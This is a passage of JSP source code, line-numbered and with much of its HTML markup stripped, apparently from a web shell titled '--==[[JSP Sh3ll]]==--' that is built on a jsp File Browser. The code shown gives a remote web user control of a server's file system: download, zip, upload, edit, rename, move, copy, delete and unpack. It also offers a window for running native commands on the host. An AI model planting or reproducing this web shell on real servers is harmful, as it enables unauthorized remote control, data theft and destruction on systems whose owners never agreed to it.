= 0;i < v.size(); i++){ 739 | File f = (File) v.get(i); 740 | if (!isAllowed(f)){ 741 | notAllowedFile = f.getAbsolutePath(); 742 | break; 743 | } 744 | } 745 | if (notAllowedFile != null){ 746 | request.setAttribute("error", "You are not allowed to access " + notAllowedFile); 747 | } 748 | else if (v.size() == 0) { 749 | request.setAttribute("error", "No files selected"); 750 | } 751 | else { 752 | File dir_file = new File("" + request.getAttribute("dir")); 753 | int dir_l = dir_file.getAbsolutePath().length(); 754 | response.setContentType("application/zip"); 755 | response.setHeader("Content-Disposition", "attachment;filename=\"rename_me.zip\""); 756 | out.clearBuffer(); 757 | ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out)); 758 | zipout.setComment("Created by jsp File Browser v. " + VERSION_NR); 759 | zipout.setLevel(COMPRESSION_LEVEL); 760 | for (int i = 0; i < v.size(); i++) { 761 | File f = (File) v.get(i); 762 | if (f.canRead()) { 763 | zipout.putNextEntry(new ZipEntry(f.getAbsolutePath().substring(dir_l + 1))); 764 | BufferedInputStream fr = new BufferedInputStream(new FileInputStream(f)); 765 | byte buffer[] = new byte[0xffff]; 766 | copyStreamsWithoutClose(fr, zipout, buffer); 767 | /* int b; 768 | while ((b=fr.read())!=-1) zipout.write(b);*/ 769 | fr.close(); 770 | zipout.closeEntry(); 771 | } 772 | } 773 | zipout.finish(); 774 | out.flush(); 775 | nohtml = true; 776 | dir_view = false; 777 | } 778 | } 779 | // Download file 780 | else if (request.getParameter("downfile") != null) { 781 | String filePath = request.getParameter("downfile"); 782 | File f = new File(filePath); 783 | if (!isAllowed(f)){ 784 | request.setAttribute("dir", f.getParent()); 785 | request.setAttribute("error", "You are not allowed to access " + f.getAbsoluteFile()); 786 | } 787 | else if (f.exists() && f.canRead()) { 788 | response.setContentType("application/octet-stream"); 789 | response.setHeader("Content-Disposition", "attachment;filename=\"" + f.getName() 790 | + "\""); 791 | response.setContentLength((int) f.length()); 792 | BufferedInputStream fileInput = new BufferedInputStream(new FileInputStream(f)); 793 | byte buffer[] = new byte[8 * 1024]; 794 | out.clearBuffer(); 795 | OutputStream out_s = new Writer2Stream(out); 796 | copyStreamsWithoutClose(fileInput, out_s, buffer); 797 | fileInput.close(); 798 | out_s.flush(); 799 | nohtml = true; 800 | dir_view = false; 801 | } 802 | else { 803 | request.setAttribute("dir", f.getParent()); 804 | request.setAttribute("error", "File " + f.getAbsolutePath() 805 | + " does not exist or is not readable on the server"); 806 | } 807 | } 808 | if (nohtml) return; 809 | //else 810 | // If no parameter is submitted, it will take the path from jsp file browser 811 | if (request.getAttribute("dir") == null) { 812 | String path = null; 813 | if (application.getRealPath(request.getRequestURI()) != null) path = new File( 814 | application.getRealPath(request.getRequestURI())).getParent(); 815 | 816 | if (path == null) { // handle the case where we are not in a directory (ex: war file) 817 | path = new File(".").getAbsolutePath(); 818 | } 819 | //Check path 820 | if (!isAllowed(new File(path))){ 821 | if (RESTRICT_PATH.indexOf(";")<0) path = RESTRICT_PATH; 822 | else path = RESTRICT_PATH.substring(0, RESTRICT_PATH.indexOf(";")); 823 | } 824 | request.setAttribute("dir", path); 825 | }%> 826 | 828 | 829 | 830 | 831 | 832 | 833 | 834 | 835 | 836 | <% 837 | //If a cssfile exists, it will take it 838 | String cssPath = null; 839 | if (application.getRealPath(request.getRequestURI()) != null) cssPath = new File( 840 | application.getRealPath(request.getRequestURI())).getParent() 841 | + File.separator + CSS_NAME; 842 | if (cssPath == null) cssPath = application.getResource(CSS_NAME).toString(); 843 | if (new File(cssPath).exists()) { 844 | %> 845 | 846 | <%} 847 | else if (request.getParameter("uplMonitor") == null) {%> 848 | 849 | 850 | 851 | 852 | 853 | 854 | 855 | 856 | --==[[JSP Sh3ll]]==-- 857 | 858 | 859 | 860 | 861 | 1022 | <%} 1023 | 1024 | //Check path 1025 | if (!isAllowed(new File((String)request.getAttribute("dir")))){ 1026 | request.setAttribute("error", "You are not allowed to access " + request.getAttribute("dir")); 1027 | } 1028 | //Upload monitor 1029 | else if (request.getParameter("uplMonitor") != null) {%> 1030 | <% 1033 | String fname = request.getParameter("uplMonitor"); 1034 | //First opening 1035 | boolean first = false; 1036 | if (request.getParameter("first") != null) first = true; 1037 | UplInfo info = new UplInfo(); 1038 | if (!first) { 1039 | info = UploadMonitor.getInfo(fname); 1040 | if (info == null) { 1041 | //Windows 1042 | int posi = fname.lastIndexOf("\\"); 1043 | if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); 1044 | } 1045 | if (info == null) { 1046 | //Unix 1047 | int posi = fname.lastIndexOf("/"); 1048 | if (posi != -1) info = UploadMonitor.getInfo(fname.substring(posi + 1)); 1049 | } 1050 | } 1051 | dir_view = false; 1052 | request.setAttribute("dir", null); 1053 | if (info.aborted) { 1054 | UploadMonitor.remove(fname); 1055 | %> 1056 | 1057 | 1058 | 1059 | Upload of <%=fname%>

1060 | Upload aborted. 1061 | <% 1062 | } 1063 | else if (info.totalSize != info.currSize || info.currSize == 0) { 1064 | %> 1065 | 1066 | 1067 | 1068 | Upload of <%=fname%>

1069 |
1070 | 1071 | 1072 |
1073 | <%=convertFileSize(info.currSize)%> from <%=convertFileSize(info.totalSize)%> 1074 | (<%=info.getPercent()%> %) uploaded (Speed: <%=info.getUprate()%>).
1075 | Time: <%=info.getTimeElapsed()%> from <%=info.getTimeEstimated()%> 1076 | 1077 | <% 1078 | } 1079 | else { 1080 | UploadMonitor.remove(fname); 1081 | %> 1082 | 1083 | 1084 | Upload of <%=fname%>

1085 | Upload finished. 1086 | 1087 | <% 1088 | } 1089 | } 1090 | //Comandwindow 1091 | else if (request.getParameter("command") != null) { 1092 | if (!NATIVE_COMMANDS){ 1093 | request.setAttribute("error", "Execution of native commands is not allowed!"); 1094 | } 1095 | else if (!"Cancel".equalsIgnoreCase(request.getParameter("Submit"))) { 1096 | %> 1097 | Launch commands in <%=request.getAttribute("dir")%> 1098 | 1099 | 1100 | <% 1101 | out.println("
\n" 1102 | + " 1110 | "> 1111 |
1112 | 1113 | 1116 | 1119 |
1114 | 1115 |
1117 | "> 1118 |
1120 |
1121 | 1122 | 1123 | <% 1124 | dir_view = false; 1125 | request.setAttribute("dir", null); 1126 | } 1127 | } 1128 | 1129 | //Click on a filename, special viewer (zip+jar file) 1130 | else if (request.getParameter("file") != null) { 1131 | File f = new File(request.getParameter("file")); 1132 | if (!isAllowed(f)){ 1133 | request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); 1134 | } 1135 | else if (isPacked(f.getName(), false)) { 1136 | //ZipFile 1137 | try { 1138 | ZipFile zf = new ZipFile(f); 1139 | Enumeration entries = zf.entries(); 1140 | %> 1141 | <%= f.getAbsolutePath()%> 1142 | 1143 | 1144 |

Content of <%=conv2Html(f.getName())%>


1145 | 1146 | 1147 | <% 1148 | long size = 0; 1149 | int fileCount = 0; 1150 | while (entries.hasMoreElements()) { 1151 | ZipEntry entry = (ZipEntry) entries.nextElement(); 1152 | if (!entry.isDirectory()) { 1153 | fileCount++; 1154 | size += entry.getSize(); 1155 | long ratio = 0; 1156 | if (entry.getSize() != 0) ratio = (entry.getCompressedSize() * 100) 1157 | / entry.getSize(); 1158 | out.println(""); 1163 | 1164 | } 1165 | } 1166 | zf.close(); 1167 | //No directory view 1168 | dir_view = false; 1169 | request.setAttribute("dir", null); 1170 | %> 1171 |
NameUncompressed sizeCompressed sizeCompr. ratioDate
" + conv2Html(entry.getName()) 1159 | + "" + convertFileSize(entry.getSize()) + "" 1160 | + convertFileSize(entry.getCompressedSize()) + "" 1161 | + ratio + "%" + "" 1162 | + dateFormat.format(new Date(entry.getTime())) + "
1172 |

1173 | <%=convertFileSize(size)%> in <%=fileCount%> files in <%=f.getName()%>. Compression ratio: <%=(f.length() * 100) / size%>% 1174 |

1175 | 1176 | <% 1177 | } 1178 | catch (ZipException ex) { 1179 | request.setAttribute("error", "Cannot read " + f.getName() 1180 | + ", no valid zip file"); 1181 | } 1182 | catch (IOException ex) { 1183 | request.setAttribute("error", "Reading of " + f.getName() + " aborted. Error: " 1184 | + ex); 1185 | } 1186 | } 1187 | } 1188 | // Upload 1189 | else if ((request.getContentType() != null) 1190 | && (request.getContentType().toLowerCase().startsWith("multipart"))) { 1191 | response.setContentType("text/html"); 1192 | HttpMultiPartParser parser = new HttpMultiPartParser(); 1193 | boolean error = false; 1194 | try { 1195 | int bstart = request.getContentType().lastIndexOf("oundary="); 1196 | String bound = request.getContentType().substring(bstart + 8); 1197 | int clength = request.getContentLength(); 1198 | Hashtable ht = parser 1199 | .processData(request.getInputStream(), bound, tempdir, clength); 1200 | if (!isAllowed(new File((String)ht.get("dir")))){ 1201 | request.setAttribute("error", "You are not allowed to access " + ht.get("dir")); 1202 | error = true; 1203 | } 1204 | else if (ht.get("myFile") != null) { 1205 | FileInfo fi = (FileInfo) ht.get("myFile"); 1206 | File f = fi.file; 1207 | UplInfo info = UploadMonitor.getInfo(fi.clientFileName); 1208 | if (info != null && info.aborted) { 1209 | f.delete(); 1210 | request.setAttribute("error", "Upload aborted"); 1211 | } 1212 | else { 1213 | // Move file from temp to the right dir 1214 | String path = (String) ht.get("dir"); 1215 | if (!path.endsWith(File.separator)) path = path + File.separator; 1216 | if (!f.renameTo(new File(path + f.getName()))) { 1217 | request.setAttribute("error", "Cannot upload file."); 1218 | error = true; 1219 | f.delete(); 1220 | } 1221 | } 1222 | } 1223 | else { 1224 | request.setAttribute("error", "No file selected for upload"); 1225 | error = true; 1226 | } 1227 | request.setAttribute("dir", (String) ht.get("dir")); 1228 | } 1229 | catch (Exception e) { 1230 | request.setAttribute("error", "Error " + e + ". Upload aborted"); 1231 | error = true; 1232 | } 1233 | if (!error) request.setAttribute("message", "File upload correctly finished."); 1234 | } 1235 | // The form to edit a text file 1236 | else if (request.getParameter("editfile") != null) { 1237 | File ef = new File(request.getParameter("editfile")); 1238 | if (!isAllowed(ef)){ 1239 | request.setAttribute("error", "You are not allowed to access " + ef.getAbsolutePath()); 1240 | } 1241 | else{ 1242 | %> 1243 | Edit <%=conv2Html(request.getParameter("editfile"))%> 1244 | 1245 | 1246 | <% 1247 | BufferedReader reader = new BufferedReader(new FileReader(ef)); 1248 | String disable = ""; 1249 | if (!ef.canWrite()) disable = " readonly"; 1250 | out.println("
\n" 1251 | + " 1270 | "> 1271 |
1272 | 1273 | 1274 | 1275 | 1276 | 1277 | 1278 | 1281 |
>Ms-Dos/Windows>UnixWrite backup
1279 | "> 1280 |
1282 |
1283 | 1284 | 1285 | <% 1286 | } 1287 | } 1288 | // Save or cancel the edited file 1289 | else if (request.getParameter("nfile") != null) { 1290 | File f = new File(request.getParameter("nfile")); 1291 | File new_f = new File(getDir(f.getParent(), request.getParameter("new_name"))); 1292 | if (!isAllowed(new_f)){ 1293 | request.setAttribute("error", "You are not allowed to access " + new_f.getAbsolutePath()); 1294 | } 1295 | else if (request.getParameter("Submit").equals("Save")) { 1296 | if (new_f.exists() && new_f.canWrite() && request.getParameter("Backup") != null) { 1297 | File bak = new File(new_f.getAbsolutePath() + ".bak"); 1298 | bak.delete(); 1299 | new_f.renameTo(bak); 1300 | } 1301 | if (new_f.exists() && !new_f.canWrite()) request.setAttribute("error", 1302 | "Cannot write to " + new_f.getName() + ", file is write protected."); 1303 | else { 1304 | BufferedWriter outs = new BufferedWriter(new FileWriter(new_f)); 1305 | StringReader text = new StringReader(request.getParameter("text")); 1306 | int i; 1307 | boolean cr = false; 1308 | String lineend = "\n"; 1309 | if (request.getParameter("lineformat").equals("dos")) lineend = "\r\n"; 1310 | while ((i = text.read()) >= 0) { 1311 | if (i == '\r') cr = true; 1312 | else if (i == '\n') { 1313 | outs.write(lineend); 1314 | cr = false; 1315 | } 1316 | else if (cr) { 1317 | outs.write(lineend); 1318 | cr = false; 1319 | } 1320 | else { 1321 | outs.write(i); 1322 | cr = false; 1323 | } 1324 | } 1325 | outs.flush(); 1326 | outs.close(); 1327 | } 1328 | } 1329 | request.setAttribute("dir", f.getParent()); 1330 | } 1331 | //Unpack file to the current directory without overwriting 1332 | else if (request.getParameter("unpackfile") != null) { 1333 | File f = new File(request.getParameter("unpackfile")); 1334 | String root = f.getParent(); 1335 | request.setAttribute("dir", root); 1336 | if (!isAllowed(new File(root))){ 1337 | request.setAttribute("error", "You are not allowed to access " + root); 1338 | } 1339 | //Check if file exists 1340 | else if (!f.exists()) { 1341 | request.setAttribute("error", "Cannot unpack " + f.getName() 1342 | + ", file does not exist"); 1343 | } 1344 | //Check if directory is readonly 1345 | else if (!f.getParentFile().canWrite()) { 1346 | request.setAttribute("error", "Cannot unpack " + f.getName() 1347 | + ", directory is write protected."); 1348 | } 1349 | //GZip 1350 | else if (f.getName().toLowerCase().endsWith(".gz")) { 1351 | //New name is old Name without .gz 1352 | String newName = f.getAbsolutePath().substring(0, f.getAbsolutePath().length() - 3); 1353 | try { 1354 | byte buffer[] = new byte[0xffff]; 1355 | copyStreams(new GZIPInputStream(new FileInputStream(f)), new FileOutputStream( 1356 | newName), buffer); 1357 | } 1358 | catch (IOException ex) { 1359 | request.setAttribute("error", "Unpacking of " + f.getName() 1360 | + " aborted. Error: " + ex); 1361 | } 1362 | } 1363 | //Else try Zip 1364 | else { 1365 | try { 1366 | ZipFile zf = new ZipFile(f); 1367 | Enumeration entries = zf.entries(); 1368 | //First check whether a file already exist 1369 | boolean error = false; 1370 | while (entries.hasMoreElements()) { 1371 | ZipEntry entry = (ZipEntry) entries.nextElement(); 1372 | if (!entry.isDirectory() 1373 | && new File(root + File.separator + entry.getName()).exists()) { 1374 | request.setAttribute("error", "Cannot unpack " + f.getName() 1375 | + ", File " + entry.getName() + " already exists."); 1376 | error = true; 1377 | break; 1378 | } 1379 | } 1380 | if (!error) { 1381 | //Unpack File 1382 | entries = zf.entries(); 1383 | byte buffer[] = new byte[0xffff]; 1384 | while (entries.hasMoreElements()) { 1385 | ZipEntry entry = (ZipEntry) entries.nextElement(); 1386 | File n = new File(root + File.separator + entry.getName()); 1387 | if (entry.isDirectory()) n.mkdirs(); 1388 | else { 1389 | n.getParentFile().mkdirs(); 1390 | n.createNewFile(); 1391 | copyStreams(zf.getInputStream(entry), new FileOutputStream(n), 1392 | buffer); 1393 | } 1394 | } 1395 | zf.close(); 1396 | request.setAttribute("message", "Unpack of " + f.getName() 1397 | + " was successful."); 1398 | } 1399 | } 1400 | catch (ZipException ex) { 1401 | request.setAttribute("error", "Cannot unpack " + f.getName() 1402 | + ", no valid zip file"); 1403 | } 1404 | catch (IOException ex) { 1405 | request.setAttribute("error", "Unpacking of " + f.getName() 1406 | + " aborted. Error: " + ex); 1407 | } 1408 | } 1409 | } 1410 | // Delete Files 1411 | else if ((request.getParameter("Submit") != null) 1412 | && (request.getParameter("Submit").equals(DELETE_FILES))) { 1413 | Vector v = expandFileList(request.getParameterValues("selfile"), true); 1414 | boolean error = false; 1415 | //delete backwards 1416 | for (int i = v.size() - 1; i >= 0; i--) { 1417 | File f = (File) v.get(i); 1418 | if (!isAllowed(f)){ 1419 | request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); 1420 | error = true; 1421 | break; 1422 | } 1423 | if (!f.canWrite() || !f.delete()) { 1424 | request.setAttribute("error", "Cannot delete " + f.getAbsolutePath() 1425 | + ". Deletion aborted"); 1426 | error = true; 1427 | break; 1428 | } 1429 | } 1430 | if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files deleted"); 1431 | else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File deleted"); 1432 | else if (!error) request.setAttribute("error", "No files selected"); 1433 | } 1434 | // Create Directory 1435 | else if ((request.getParameter("Submit") != null) 1436 | && (request.getParameter("Submit").equals(CREATE_DIR))) { 1437 | String dir = "" + request.getAttribute("dir"); 1438 | String dir_name = request.getParameter("cr_dir"); 1439 | String new_dir = getDir(dir, dir_name); 1440 | if (!isAllowed(new File(new_dir))){ 1441 | request.setAttribute("error", "You are not allowed to access " + new_dir); 1442 | } 1443 | else if (new File(new_dir).mkdirs()) { 1444 | request.setAttribute("message", "Directory created"); 1445 | } 1446 | else request.setAttribute("error", "Creation of directory " + new_dir + " failed"); 1447 | } 1448 | // Create a new empty file 1449 | else if ((request.getParameter("Submit") != null) 1450 | && (request.getParameter("Submit").equals(CREATE_FILE))) { 1451 | String dir = "" + request.getAttribute("dir"); 1452 | String file_name = request.getParameter("cr_dir"); 1453 | String new_file = getDir(dir, file_name); 1454 | if (!isAllowed(new File(new_file))){ 1455 | request.setAttribute("error", "You are not allowed to access " + new_file); 1456 | } 1457 | // Test, if file_name is empty 1458 | else if (!"".equals(file_name.trim()) && !file_name.endsWith(File.separator)) { 1459 | if (new File(new_file).createNewFile()) request.setAttribute("message", 1460 | "File created"); 1461 | else request.setAttribute("error", "Creation of file " + new_file + " failed"); 1462 | } 1463 | else request.setAttribute("error", "Error: " + file_name + " is not a valid filename"); 1464 | } 1465 | // Rename a file 1466 | else if ((request.getParameter("Submit") != null) 1467 | && (request.getParameter("Submit").equals(RENAME_FILE))) { 1468 | Vector v = expandFileList(request.getParameterValues("selfile"), true); 1469 | String dir = "" + request.getAttribute("dir"); 1470 | String new_file_name = request.getParameter("cr_dir"); 1471 | String new_file = getDir(dir, new_file_name); 1472 | if (!isAllowed(new File(new_file))){ 1473 | request.setAttribute("error", "You are not allowed to access " + new_file); 1474 | } 1475 | // The error conditions: 1476 | // 1) Zero Files selected 1477 | else if (v.size() <= 0) request.setAttribute("error", 1478 | "Select exactly one file or folder. Rename failed"); 1479 | // 2a) Multiple files selected and the first isn't a dir 1480 | // Here we assume that expandFileList builds v from top-bottom, starting with the dirs 1481 | else if ((v.size() > 1) && !(((File) v.get(0)).isDirectory())) request.setAttribute( 1482 | "error", "Select exactly one file or folder. Rename failed"); 1483 | // 2b) If there are multiple files from the same directory, rename fails 1484 | else if ((v.size() > 1) && ((File) v.get(0)).isDirectory() 1485 | && !(((File) v.get(0)).getPath().equals(((File) v.get(1)).getParent()))) { 1486 | request.setAttribute("error", "Select exactly one file or folder. Rename failed"); 1487 | } 1488 | else { 1489 | File f = (File) v.get(0); 1490 | if (!isAllowed(f)){ 1491 | request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); 1492 | } 1493 | // Test, if file_name is empty 1494 | else if ((new_file.trim() != "") && !new_file.endsWith(File.separator)) { 1495 | if (!f.canWrite() || !f.renameTo(new File(new_file.trim()))) { 1496 | request.setAttribute("error", "Creation of file " + new_file + " failed"); 1497 | } 1498 | else request.setAttribute("message", "Renamed file " 1499 | + ((File) v.get(0)).getName() + " to " + new_file); 1500 | } 1501 | else request.setAttribute("error", "Error: \"" + new_file_name 1502 | + "\" is not a valid filename"); 1503 | } 1504 | } 1505 | // Move selected file(s) 1506 | else if ((request.getParameter("Submit") != null) 1507 | && (request.getParameter("Submit").equals(MOVE_FILES))) { 1508 | Vector v = expandFileList(request.getParameterValues("selfile"), true); 1509 | String dir = "" + request.getAttribute("dir"); 1510 | String dir_name = request.getParameter("cr_dir"); 1511 | String new_dir = getDir(dir, dir_name); 1512 | if (!isAllowed(new File(new_dir))){ 1513 | request.setAttribute("error", "You are not allowed to access " + new_dir); 1514 | } 1515 | else{ 1516 | boolean error = false; 1517 | // This ensures that new_dir is a directory 1518 | if (!new_dir.endsWith(File.separator)) new_dir += File.separator; 1519 | for (int i = v.size() - 1; i >= 0; i--) { 1520 | File f = (File) v.get(i); 1521 | if (!isAllowed(f)){ 1522 | request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); 1523 | error = true; 1524 | break; 1525 | } 1526 | else if (!f.canWrite() || !f.renameTo(new File(new_dir 1527 | + f.getAbsolutePath().substring(dir.length())))) { 1528 | request.setAttribute("error", "Cannot move " + f.getAbsolutePath() 1529 | + ". Move aborted"); 1530 | error = true; 1531 | break; 1532 | } 1533 | } 1534 | if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files moved"); 1535 | else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File moved"); 1536 | else if (!error) request.setAttribute("error", "No files selected"); 1537 | } 1538 | } 1539 | // Copy Files 1540 | else if ((request.getParameter("Submit") != null) 1541 | && (request.getParameter("Submit").equals(COPY_FILES))) { 1542 | Vector v = expandFileList(request.getParameterValues("selfile"), true); 1543 | String dir = (String) request.getAttribute("dir"); 1544 | if (!dir.endsWith(File.separator)) dir += File.separator; 1545 | String dir_name = request.getParameter("cr_dir"); 1546 | String new_dir = getDir(dir, dir_name); 1547 | if (!isAllowed(new File(new_dir))){ 1548 | request.setAttribute("error", "You are not allowed to access " + new_dir); 1549 | } 1550 | else{ 1551 | boolean error = false; 1552 | if (!new_dir.endsWith(File.separator)) new_dir += File.separator; 1553 | try { 1554 | byte buffer[] = new byte[0xffff]; 1555 | for (int i = 0; i < v.size(); i++) { 1556 | File f_old = (File) v.get(i); 1557 | File f_new = new File(new_dir + f_old.getAbsolutePath().substring(dir.length())); 1558 | if (!isAllowed(f_old)|| !isAllowed(f_new)){ 1559 | request.setAttribute("error", "You are not allowed to access " + f_new.getAbsolutePath()); 1560 | error = true; 1561 | } 1562 | else if (f_old.isDirectory()) f_new.mkdirs(); 1563 | // Overwriting is forbidden 1564 | else if (!f_new.exists()) { 1565 | copyStreams(new FileInputStream(f_old), new FileOutputStream(f_new), buffer); 1566 | } 1567 | else { 1568 | // File exists 1569 | request.setAttribute("error", "Cannot copy " + f_old.getAbsolutePath() 1570 | + ", file already exists. Copying aborted"); 1571 | error = true; 1572 | break; 1573 | } 1574 | } 1575 | } 1576 | catch (IOException e) { 1577 | request.setAttribute("error", "Error " + e + ". Copying aborted"); 1578 | error = true; 1579 | } 1580 | if ((!error) && (v.size() > 1)) request.setAttribute("message", "All files copied"); 1581 | else if ((!error) && (v.size() > 0)) request.setAttribute("message", "File copied"); 1582 | else if (!error) request.setAttribute("error", "No files selected"); 1583 | } 1584 | } 1585 | // Directory viewer 1586 | if (dir_view && request.getAttribute("dir") != null) { 1587 | File f = new File("" + request.getAttribute("dir")); 1588 | //Check, whether the dir exists 1589 | if (!f.exists() || !isAllowed(f)) { 1590 | if (!f.exists()){ 1591 | //request.setAttribute("error", "Directory " + f.getAbsolutePath() + " does not exist."); 1592 | } 1593 | else{ 1594 | request.setAttribute("error", "You are not allowed to access " + f.getAbsolutePath()); 1595 | } 1596 | //if attribute olddir exists, it will change to olddir 1597 | if (request.getAttribute("olddir") != null && isAllowed(new File((String) request.getAttribute("olddir")))) { 1598 | f = new File("" + request.getAttribute("olddir")); 1599 | } 1600 | //try to go to the parent dir 1601 | else { 1602 | if (f.getParent() != null && isAllowed(f)) f = new File(f.getParent()); 1603 | } 1604 | //If this dir also do also not exist, go back to browser.jsp root path 1605 | if (!f.exists()) { 1606 | String path = null; 1607 | if (application.getRealPath(request.getRequestURI()) != null) path = new File( 1608 | application.getRealPath(request.getRequestURI())).getParent(); 1609 | 1610 | if (path == null) // handle the case were we are not in a directory (ex: war file) 1611 | path = new File(".").getAbsolutePath(); 1612 | f = new File(path); 1613 | } 1614 | if (isAllowed(f)) request.setAttribute("dir", f.getAbsolutePath()); 1615 | else request.setAttribute("dir", null); 1616 | } 1617 | %> 1618 | 1684 | <%=request.getAttribute("dir")%> 1685 | 1686 | 1687 | <% 1688 | //Output message 1689 | if (request.getAttribute("message") != null) { 1690 | out.println("
"); 1691 | out.println(request.getAttribute("message")); 1692 | out.println("
"); 1693 | } 1694 | //Output error 1695 | if (request.getAttribute("error") != null) { 1696 | out.println("
"); 1697 | out.println(request.getAttribute("error")); 1698 | out.println("
"); 1699 | } 1700 | if (request.getAttribute("dir") != null){ 1701 | %> 1702 |
1703 | 1704 | <% 1705 | // Output the table, starting with the headers. 1706 | String dir = URLEncoder.encode("" + request.getAttribute("dir")); 1707 | String cmd = browser_name + "?dir=" + dir; 1708 | int sortMode = 1; 1709 | if (request.getParameter("sort") != null) sortMode = Integer.parseInt(request 1710 | .getParameter("sort")); 1711 | int[] sort = new int[] {1, 2, 3, 4}; 1712 | for (int i = 0; i < sort.length; i++) 1713 | if (sort[i] == sortMode) sort[i] = -sort[i]; 1714 | out.println("" 1716 | + "" 1718 | + "" 1720 | + "" 1722 | + ""); 1723 | char trenner = File.separatorChar; 1724 | // Output the Root-Dirs, without FORBIDDEN_DRIVES 1725 | File[] entry = File.listRoots(); 1726 | for (int i = 0; i < entry.length; i++) { 1727 | boolean forbidden = false; 1728 | for (int i2 = 0; i2 < FORBIDDEN_DRIVES.length; i2++) { 1729 | if (entry[i].getAbsolutePath().toLowerCase().equals(FORBIDDEN_DRIVES[i2])) forbidden = true; 1730 | } 1731 | if (!forbidden) { 1732 | out.println(""); 1734 | out.println(""); 1741 | } 1742 | } 1743 | // Output the parent directory link ".." 1744 | if (f.getParent() != null) { 1745 | out.println(""); 1747 | out.println(""); 1752 | } 1753 | // Output all files and dirs and calculate the number of files and total size 1754 | entry = f.listFiles(); 1755 | if (entry == null) entry = new File[] {}; 1756 | long totalSize = 0; // The total size of the files in the current directory 1757 | long fileCount = 0; // The count of files in the current working directory 1758 | if (entry != null && entry.length > 0) { 1759 | Arrays.sort(entry, new FileComp(sortMode)); 1760 | for (int i = 0; i < entry.length; i++) { 1761 | String name = URLEncoder.encode(entry[i].getAbsolutePath()); 1762 | String type = "File"; // This String will tell the extension of the file 1763 | if (entry[i].isDirectory()) type = "DIR"; // It's a DIR 1764 | else { 1765 | String tempName = entry[i].getName().replace(' ', '_'); 1766 | if (tempName.lastIndexOf('.') != -1) type = tempName.substring( 1767 | tempName.lastIndexOf('.')).toLowerCase(); 1768 | } 1769 | String ahref = ""; 1775 | String link = buf; // The standard view link, uses Mime-type 1776 | if (entry[i].isDirectory()) { 1777 | if (entry[i].canRead() && USE_DIR_PREVIEW) { 1778 | //Show the first DIR_PREVIEW_NUMBER directory entries in a tooltip 1779 | File[] fs = entry[i].listFiles(); 1780 | if (fs == null) fs = new File[] {}; 1781 | Arrays.sort(fs, new FileComp()); 1782 | StringBuffer filenames = new StringBuffer(); 1783 | for (int i2 = 0; (i2 < fs.length) && (i2 < 10); i2++) { 1784 | String fname = conv2Html(fs[i2].getName()); 1785 | if (fs[i2].isDirectory()) filenames.append("[" + fname + "];"); 1786 | else filenames.append(fname + ";"); 1787 | } 1788 | if (fs.length > DIR_PREVIEW_NUMBER) filenames.append("..."); 1789 | else if (filenames.length() > 0) filenames 1790 | .setLength(filenames.length() - 1); 1791 | link = ahref + "dir=" + name + "\" title=\"" + filenames + "\">" 1792 | + FOL_IMG + "[" + buf + "]"; 1793 | } 1794 | else if (entry[i].canRead()) { 1795 | link = ahref + "dir=" + name + "\">" + FOL_IMG + "[" + buf + "]"; 1796 | } 1797 | else link = FOL_IMG + "[" + buf + "]"; 1798 | } 1799 | else if (entry[i].isFile()) { //Entry is file 1800 | totalSize = totalSize + entry[i].length(); 1801 | fileCount = fileCount + 1; 1802 | if (entry[i].canRead()) { 1803 | dlink = ahref + "downfile=" + name + "\">Download"; 1804 | //If you click at the filename 1805 | if (USE_POPUP) link = ahref + "file=" + name + "\" target=\"_blank\">" 1806 | + buf + ""; 1807 | else link = ahref + "file=" + name + "\">" + buf + ""; 1808 | if (entry[i].canWrite()) { // The file can be edited 1809 | //If it is a zip or jar File you can unpack it 1810 | if (isPacked(name, true)) elink = ahref + "unpackfile=" + name 1811 | + "\">Unpack"; 1812 | else elink = ahref + "editfile=" + name + "\">Edit"; 1813 | } 1814 | else { // If the file cannot be edited 1815 | //If it is a zip or jar File you can unpack it 1816 | if (isPacked(name, true)) elink = ahref + "unpackfile=" + name 1817 | + "\">Unpack"; 1818 | else elink = ahref + "editfile=" + name + "\">View"; 1819 | } 1820 | } 1821 | else { 1822 | link = buf; 1823 | } 1824 | } 1825 | String date = dateFormat.format(new Date(entry[i].lastModified())); 1826 | out.println(""); 1828 | if (entry[i].canRead()) { 1829 | out 1830 | .println(""); 1832 | } 1833 | else { 1834 | out 1835 | .println(""); 1836 | } 1837 | out.print(""); 1838 | if (entry[i].isDirectory()) out.print(""); 1839 | else { 1840 | out.print(""); 1842 | } 1843 | out.println(""); // The edit link (or view, depending) 1847 | } 1848 | }%> 1849 |
 NameSizeTypeDate  
 "); 1735 | String name = URLEncoder.encode(entry[i].getAbsolutePath()); 1736 | String buf = entry[i].getAbsolutePath(); 1737 | out.println("  [" + buf + "]"); 1739 | out 1740 | .println("     
"); 1748 | out.println("  " + FOL_IMG + "[..]"); 1750 | out 1751 | .println("     
 " + link + " " 1841 | + convertFileSize(entry[i].length()) + "" + type + "  " + // The file type (extension) 1844 | date + "" + // The date the file was created 1845 | dlink + "" + // The download link 1846 | elink + "
1850 | Select all 1851 |

1852 | 1853 | <%=convertFileSize(totalSize)%> in <%=fileCount%> files in <%= dir2linkdir((String) request.getAttribute("dir"), browser_name, sortMode)%> 1854 | 1855 |

1856 |

1857 | "> 1858 | 1859 | 1860 | 1862 |

1863 |

1864 | 1865 | 1866 | 1867 | 1868 | 1869 | 1870 |

1871 |
1872 |
1873 | "> 1874 | 1875 | 1876 | 1878 |
1879 | <% if (NATIVE_COMMANDS){%> 1880 |
1881 | "> 1882 | 1883 | 1884 | 1885 |
<% 1886 | } 1887 | }%> 1888 |
